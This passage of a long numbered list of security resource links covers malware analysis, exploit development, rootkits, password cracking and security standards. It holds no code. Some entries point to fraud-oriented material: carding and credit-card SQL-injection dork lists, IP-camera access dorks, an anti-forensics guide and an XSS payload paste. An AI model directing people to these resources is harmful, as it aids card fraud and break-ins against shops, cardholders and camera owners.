http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/ -1105-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -1106-Reverse Engineering Cheat Sheet: https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet -1107-Reverse Engineering For Malware Analysis: https://eforensicsmag.com/reverse_engi_cheatsheet/ -1108-Reverse-engineering Cheat Sheets : https://www.cheatography.com/tag/reverse-engineering/ -1109-Shortcuts for Understanding Malicious Scripts: https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross -1110-WinDbg Malware Analysis Cheat Sheet : https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -1111-Cheat Sheet for Malware Analysis: https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/ -1112-Tips for Reverse-Engineering Malicious Code : https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet -1113-Cheatsheet for radare2 : https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html -1114-Reverse Engineering Cheat Sheets: https://www.pinterest.com/pin/576390452300827323/ -1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links: https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed -1116-Malware Resources : https://www.professor.bike/malware-resources -1117-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1118-Getting cozy with exploit development: https://0x00sec.org/t/getting-cozy-with-exploit-development/5311 -1119-appsec - Web Security Cheatsheet : https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list -1120-PEDA - Python Exploit Development Assistance For GDB: https://www.pinterest.ru/pin/789044797190775841/ -1121-Exploit Development Introduction (part 1) : https://www.cybrary.it/video/exploit-development-introduction-part-1/ -1122-Windows Exploit Development: A simple buffer overflow example: https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a -1123-Exploit Development-Everything You Need to Know: https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ -1124-Exploit Development : https://0x00sec.org/c/exploit-development -1125-Exploit Development - Infosec Resources: https://resources.infosecinstitute.com/category/exploit-development/ -1126-Exploit Development : https://www.reddit.com/r/ExploitDev/ -1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1128-Exploit Development for Beginners: https://www.youtube.com/watch?v=tVDuuz60KKc -1129-Introduction to Exploit Development: https://www.fuzzysecurity.com/tutorials/expDev/1.html -1130-Exploit Development And Reverse Engineering: https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html -1131-wireless forensics: https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023 -1132-fake AP Detection: https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866 -1133-In-Depth analysis of SamSam Ransomware: https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ -1134-WannaCry ransomware: https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis -1135-malware analysis: https://www.sans.org/reading-room/whitepapers/malicious/paper/2103 -1136-Metasploit's detailed communication and protocol writeup: https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf -1137-Metasploit's SSL-generation module:: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb -1139-Empire IOCs:: https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315 -1140-excellent free training on glow analysis: http://opensecuritytraining.info/Flow.html -1141-NetFlow using Silk: https://tools.netsa.cert.org/silk/analysis-handbook.pdf -1142-Deep Packet Inspection: https://is.muni.cz/th/ql57c/dp-svoboda.pdf -1143-Detecting Behavioral Personas with OSINT and Datasploit: https://www.exploit-db.com/docs/45543 -1144-WordPress Penetration Testing using WPScan and MetaSploit: https://www.exploit-db.com/docs/45556 -1145-Bulk SQL Injection using Burp-to-SQLMap: https://www.exploit-db.com/docs/45428 -1146-XML External Entity Injection - Explanation and Exploitation: https://www.exploit-db.com/docs/45374 -1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3): https://www.exploit-db.com/docs/45368 -1148-File Upload Restrictions Bypass: https://www.exploit-db.com/docs/45074 -1149-VLAN Hopping Attack: https://www.exploit-db.com/docs/45050 -1150-Jigsaw Ransomware Analysis using Volatility: https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9 -1151-Ransomware early detection by the analysis of file sharing traffic: https://www.sciencedirect.com/science/article/pii/S108480451830300X -1152-Do You Think You Can Analyse Ransomware?: https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529 -1153-Analysis of LockerGoga Ransomware : https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ -1154-Detection and Forensic Analysis of Ransomware Attacks : https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf -1155-Bad Rabbit Ransomware Technical Analysis: https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/ -1156-NotPetya Ransomware analysis : https://safe-cyberdefense.com/notpetya-ransomware-analysis/ -1157-Identifying WannaCry on Your Server Using Logs: https://www.loggly.com/blog/identifying-wannacry-server-using-logs/ -1158-The past, present, and future of ransomware: https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/ -1159-The dynamic analysis of WannaCry ransomware : https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf -1160-Malware Analysis: Ransomware - SlideShare: https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware -1161-Article: Anatomy of ransomware malware: detection, analysis : https://www.inderscience.com/info/inarticle.php?artid=84399 -1162-Tracking desktop ransomware payments : https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf -1163-What is Ransomware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/ransomware -1164-Detect and Recover from Ransomware Attacks: https://www.indexengines.com/ransomware -1165-Wingbird rootkit analysis: https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html -1166-Windows Kernel Rootkits: Techniques and Analysis: https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html -1167-Rootkit: What is a Rootkit and How to Detect It : https://www.veracode.com/security/rootkit -1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis: https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/ -1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2: https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/ -1170-ZeroAccess – an advanced kernel mode rootkit : https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf -1171-Rootkit Analysis Identification Elimination: https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination -1172-TDL3: The Rootkit of All Evil?: static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf -1173-Avatar Rootkit: Dropper Analysis: https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/ -1174-Sality rootkit analysis: https://www.prodefence.org/sality-rootkit-analysis/ -1175-RootKit Hook Analyzer: https://www.resplendence.com/hookanalyzer/ -1176-Behavioral Analysis of Rootkit Malware: https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/ -1177-Malware Memory Analysis of the IVYL Linux Rootkit: https://apps.dtic.mil/docs/citations/AD1004349 -1178-Analysis of the KNARK rootkit : https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit -1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim : https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1 -1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process -1181-Code & Process Injection - Red Teaming Experiments: https://ired.team/offensive-security/code-injection-process-injection -1182-What Malware Authors Don't want you to know: https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know -1183-.NET Process Injection: https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc -1184-Memory Injection like a Boss : https://www.countercept.com/blog/memory-injection-like-a-boss/ -1185-Process injection - Malware style: https://www.slideshare.net/demeester1/process-injection -1186-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -1187-Unpacking Redaman Malware & Basics of Self-Injection Packers: https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/ -1188-Code injection on macOS: https://knight.sc/malware/2019/03/15/code-injection-on-macos.html -1189-(Shell)Code Injection In Linux Userland : https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md -1190-Code injection on Windows using Python: https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/ -1191-What is Reflective DLL Injection and how can be detected?: https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/ -1192-Windows Process Injection: https://modexp.wordpress.com/2018/08/23/process-injection-propagate/ -1193-A+ cheat sheet: https://www.slideshare.net/abnmi/a-cheat-sheet -1194-A Bettercap Tutorial — From Installation to Mischief: https://danielmiessler.com/study/bettercap/ -1195-Debugging Malware with WinDbg: https://www.ixiacom.com/company/blog/debugging-malware-windbg -1195-Malware analysis, my own list of tools and resources: https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/ -1196-Getting Started with Reverse Engineering: https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html -1197-Debugging malicious windows scriptlets with Google chrome: https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c -1198-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1199-Intro to Malware Analysis and Reverse Engineering: https://www.cybrary.it/course/malware-analysis/ -1200-Common Malware Persistence Mechanisms: https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/ -1201-Finding Registry Malware Persistence with RECmd: https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd -1202-Windows Malware Persistence Mechanisms : https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/ -1203- persistence techniques: https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/ -1204- Persistence Mechanism - an overview | ScienceDirect Topics: https://www.sciencedirect.com/topics/computer-science/persistence-mechanism -1205-Malware analysis for Linux: https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/ -1206-Linux Malware Persistence with Cron: https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/ -1207-What is advanced persistent threat (APT)? : https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT -1208-Malware Analysis, Part 1: Understanding Code Obfuscation : https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/ -1209-Top 6 Advanced Obfuscation Techniques: https://sensorstechforum.com/advanced-obfuscation-techniques-malware/ -1210-Malware Obfuscation Techniques: https://dl.acm.org/citation.cfm?id=1908903 -1211-How Hackers Hide Their Malware: Advanced Obfuscation: https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723 -1212-Malware obfuscation techniques: four simple examples: https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/ -1213-Malware Monday: Obfuscation: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0 -1213-Challenge of Malware Analysis: Malware obfuscation Techniques: https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327 -1214-Static Malware Analysis - Infosec Resources: https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/ -1215-Malware Basic Static Analysis: https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725 -1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis: http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/ -1217-What is Malware Analysis | Different Tools for Malware Analysis: https://blog.comodo.com/different-techniques-for-malware-analysis/ -1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning: https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/ -1219-Limits of Static Analysis for Malware Detection: https://ieeexplore.ieee.org/document/4413008 -1220-Kernel mode versus user mode: https://blog.codinghorror.com/understanding-user-and-kernel-mode/ -1221-Understanding the ELF: https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571 -1222-Windows Privilege Abuse: Auditing, Detection, and Defense: https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e -1223-First steps to volatile memory analysis: https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1 -1224-Maliciously Mobile: A Brief History of Mobile Malware: https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8 -1225-Modern Binary Exploitation Writeups 0x01: https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4 -1226-Exploit Development 01 — Terminology: https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5 -1227-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1228-Best google hacking list on the net: https://pastebin.com/x5LVJu9T -1229-Google Hacking: https://pastebin.com/6nsVK5Xi -1230-OSCP links: https://pastebin.com/AiYV80uQ -1231-Pentesting 1 Information gathering: https://pastebin.com/qLitw9eT -1232-OSCP-Survival-Guide: https://pastebin.com/kdc6th08 -1233-Googledork: https://pastebin.com/qKwU37BK -1234-Exploit DB: https://pastebin.com/De4DNNKK -1235-Dorks: https://pastebin.com/cfVcqknA -1236-GOOGLE HACKİNG DATABASE: https://pastebin.com/1ndqG7aq -1237-Carding Dorks 2019: https://pastebin.com/Hqsxu6Nn -1238-17k Carding Dorks 2019: https://pastebin.com/fgdZxy74 -1239-CARDING DORKS 2019: https://pastebin.com/Y7KvzZqg -1240-sqli dork 2019: https://pastebin.com/8gdeLYvU -1241-Private Carding Dorks 2018: https://pastebin.com/F0KxkMMD -1242-20K dorks list fresh full carding 2018: https://pastebin.com/LgCh0NRJ -1243-8k Carding Dorks :): https://pastebin.com/2bjBPiEm -1244-8500 SQL DORKS: https://pastebin.com/yeREBFzp -1245-REAL CARDING DORKS: https://pastebin.com/0kMhA0Gb -1246-15k btc dorks: https://pastebin.com/zbbBXSfG -1247-Sqli dorks 2016-2017: https://pastebin.com/7TQiMj3A -1248-Here is kind of a tutorial on how to write google dorks.: https://pastebin.com/hZCXrAFK -1249-10k Private Fortnite Dorks: https://pastebin.com/SF9UmG1Y -1250-find login panel dorks: https://pastebin.com/9FGUPqZc -1251-Shell dorks: https://pastebin.com/iZBFQ5yp -1252-HQ PAID GAMING DORKS: https://pastebin.com/vNYnyW09 -1253-10K HQ Shopping DORKS: https://pastebin.com/HTP6rAt4 -1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold: https://pastebin.com/ttxAJbdW -1255-Gain access to unsecured IP cameras with these Google dorks: https://pastebin.com/93aPbwwE -1256-new fresh dorks: https://pastebin.com/ZjdxBbNB -1257-SQL DORKS FOR CC: https://pastebin.com/ZQTHwk2S -1258-Wordpress uploadify Dorks Priv8: https://pastebin.com/XAGmHVUr -1259-650 DORKS CC: https://pastebin.com/xZHARTyz -1260-3k Dorks Shopping: https://pastebin.com/e1XiNa8M -1261-DORKS 2018 : https://pastebin.com/YAZkPJ0j -1262-HQ FORTNITE DORKS LIST: https://pastebin.com/rzhiNad8 -1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING: https://pastebin.com/VwVpAvj2 -1264-Camera dorks: https://pastebin.com/fsARft2j -1265-Admin Login Dorks: https://pastebin.com/HWWNZCph -1266-sql gov dorks: https://pastebin.com/C8wqyNW8 -1267-10k hq gaming dorks: https://pastebin.com/cDLN8edi -1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! : https://pastebin.com/y59kK2h0 -1269-Dorks: https://pastebin.com/PKvZYMAa -1270-10k btc dorks: https://pastebin.com/vRnxvbCu -1271-7,000 Dorks for hacking into various sites: https://pastebin.com/n8JVQv3X -1272-List of information gathering search engines/tools etc: https://pastebin.com/GTX9X5tF -1273-FBOSINT: https://pastebin.com/5KqnFS0B -1274-Ultimate Penetration Testing: https://pastebin.com/4EEeEnXe -1275-massive list of information gathering search engines/tools : https://pastebin.com/GZ9TVxzh -1276-CEH Class: https://pastebin.com/JZdCHrN4 -1277-CEH/CHFI Bundle Study Group Sessions: https://pastebin.com/XTwksPK7 -1278-OSINT - Financial: https://pastebin.com/LtxkUi0Y -1279-Most Important Security Tools and Resources: https://pastebin.com/cGE8rG04 -1280-OSINT resources from inteltechniques.com: https://pastebin.com/Zbdz7wit -1281-Red Team Tips: https://pastebin.com/AZDBAr1m -1282-OSCP Notes by Ash: https://pastebin.com/wFWx3a7U -1283-OSCP Prep: https://pastebin.com/98JG5f2v -1284-OSCP Review/Cheat Sheet: https://pastebin.com/JMMM7t4f -1285-OSCP Prep class: https://pastebin.com/s59GPJrr -1286-Complete Anti-Forensics Guide: https://pastebin.com/6V6wZK0i -1287-The Linux Command Line Cheat Sheet: https://pastebin.com/PUtWDKX5 -1288-Command-Line Log Analysis: https://pastebin.com/WEDwpcz9 -1289-An A-Z Index of the Apple macOS command line (OS X): https://pastebin.com/RmPLQA5f -1290-San Diego Exploit Development 2018: https://pastebin.com/VfwhT8Yd -1291-Windows Exploit Development Megaprimer: https://pastebin.com/DvdEW4Az -1292-Some Free Reverse engineering resources: https://pastebin.com/si2ThQPP -1293-Sans: https://pastebin.com/MKiSnjLm -1294-Metasploit Next Level: https://pastebin.com/0jC1BUiv -1295-Just playing around....: https://pastebin.com/gHXPzf6B -1296-Red Team Course: https://pastebin.com/YUYSXNpG -1297-New Exploit Development 2018: https://pastebin.com/xaRxgYqQ -1298-Good reviews of CTP/OSCE (in no particular order):: https://pastebin.com/RSPbatip -1299-Vulnerability Research Engineering Bookmarks Collection v1.0: https://pastebin.com/8mUhjGSU -1300-Professional-hacker's Pastebin : https://pastebin.com/u/Professional-hacker -1301-Google Cheat Sheet: http://www.googleguide.com/print/adv_op_ref.pdf -1302-Shodan for penetration testers: https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf -1303-Linux networking tools: https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f -1304-DNS spoofing with NetHunter: https://cyberarms.wordpress.com/category/nethunter-tutorial/ -1305-Tips on writing a penetration testing report: https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 -1306-Technical penetration report sample: https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf -1307-Nessus sample reports: https://www.tenable.com/products/nessus/sample-reports -1308-Sample penetration testing report: https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf -1309-jonh-the-ripper-cheat-sheet: https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/ -1310-ultimate guide to cracking foreign character passwords using hashcat: http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has -1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III: https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III -1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/ -1313-CSA (Cloud Security Alliance) Security White Papers: https://cloudsecurityalliance.org/download/ -1314-NIST Security Considerations in the System Development Life Cycle: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf -1315-ISO 29100 information technology security techniques privacy framework: https://www.iso.org/standard/45123.html -1316-NIST National Checklist Program: https://nvd.nist.gov/ncp/repository -1317-OWASP Guide to Cryptography: https://www.owasp.org/index.php/Guide_to_Cryptography -1318-NVD (National Vulnerability Database): https://nvd.nist.gov/ -1319-CVE details: https://cvedetails.com/ -1320-CIS Cybersecurity Tools: https://www.cisecurity.org/cybersecurity-tools/ -1321-Security aspects of virtualization by ENISA: https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/ -1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes: https://www.cisecurity.org/cis-benchmarks/ -1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer: https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html -1324-Docker security: https://docs.docker.com/engine/security/security/ -1325-Microsoft Security Development Lifecycle: http://www.microsoft.com/en-us/SDL/ -1326-OWASP SAMM Project: https://www.owasp.org/index.php/OWASP_SAMM_Project -1327-CWE/SANS Top 25 Most Dangerous Software Errors: https://cwe.mitre.org/top25/ -1329-OWASP Vulnerable Web Applications Directory Project: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project -1330-CERT Secure Coding Standards: https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards -1331-NIST Special Publication 800-53: https://nvd.nist.gov/800-53 -1332-SAFECode Security White Papers: https://safecode.org/publications/ -1333-Microsoft Threat Modeling tool 2016: https://aka.ms/tmt2016/ -1334-Apache Metron for real-time big data security: http://metron.apache.org/documentation/ -1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process: https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf -1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf -1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications: https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items -1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf -1339-SAFECode Fundamental Practices for Secure Software Development: https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf -1340-NIST 800-64 Security Considerations in the System Development Life Cycle: https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final -1341-SANS A Security Checklist for Web Application Design: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1342-Best Practices for implementing a Security Awareness Program: https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf -1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf -1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final -1345-SafeCode Tactical Threat Modeling: https://safecode.org/safecodepublications/tactical-threat-modeling/ -1346-SANS Web Application Security Design Checklist: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1347-Data Anonymization for production data dumps: https://github.com/sunitparekh/data-anonymization -1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It: https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030 -1349-Guide to Computer Security Log Management: https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881 -1350-Malware Indicators: https://github.com/citizenlab/malware-indicators -1351-OSINT Threat Feeds: https://www.circl.lu/doc/misp/feed-osint/ -1352-SANS How to Use Threat Intelligence effectively: https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282 -1353-NIST 800-150 Guide to Cyber Threat Information Sharing: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf -1354-Securing Web Application Technologies Checklist: https://software-security.sans.org/resources/swat -1355-Firmware Security Training: https://github.com/advanced-threat-research/firmware-security-training -1356-Burp Suite Bootcamp: https://pastebin.com/5sG7Rpg5 -1357-Web app hacking: https://pastebin.com/ANsw7WRx -1358-XSS Payload: https://pastebin.com/EdxzE4P1 -1359-XSS Filter Evasion Cheat Sheet: https://pastebin.com/bUutGfSy -1360-Persistence using RunOnceEx – Hidden from Autoruns.exe: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -1361-Windows Operating System Archaeology: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology -1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky: https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/ -1363-Malware Analysis using Osquery : https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec -1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals : https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/ -1365-Userland registry hijacking: https://3gstudent.github.io/Userland-registry-hijacking/ -1366-Malware Hiding Techniques to Watch for: AlienVault Labs: https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs -1367- Full text of "Google hacking for penetration testers" : https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt -1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" : https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt -1369- Full text of "Coding For Penetration Testers" : https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt -1370- Full text of "Hacking For Dummies" : https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt -1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" : https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt -1372- Full text of "Social Engineering The Art Of Human Hacking" : https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt -1373- Full text of "CYBER WARFARE" : https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt -1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" : https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt -1375- Full text of "sectools" : https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt -1376- Full text of "Aggressive network self-defense" : https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt -1377-Community Texts: https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22 -1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" : https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt -1379- Full text of "Enzyclopedia Of Cybercrime" : https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt -1380- Full text of "Information Security Management Handbook" : https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt -1381- Full text of "ARMArchitecture Reference Manual" : https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt -1382- Full text of "Metasploit The Penetration Tester S Guide" : https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt -1383-Tips & tricks to master Google’s search engine: https://medium.com/infosec-adventures/google-hacking-39599373be7d -1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) : https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866 -1385- Google Hacking Secrets:the Hidden Codes of Google : https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google -1386-google hacking: https://www.slideshare.net/SamNizam/3-google-hacking -1387-How Penetration Testers Use Google Hacking: https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking -1388-Free Automated Malware Analysis Sandboxes and Services: https://zeltser.com/automated-malware-analysis/ -1389-How to get started with Malware Analysis and Reverse Engineering: https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/ -1390-Handy Tools And Websites For Malware Analysis: https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/ -1391-Dynamic Malware Analysis: https://prasannamundas.com/share/dynamic-malware-analysis/ -1392-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1393-Detecting malware through static and dynamic techniques: https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec... -1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools: https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools -1395-Malware Analysis Lab At Home In 5 Steps: https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/ -1396-Malware Forensics Guide - Static and Dynamic Approach: https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/ 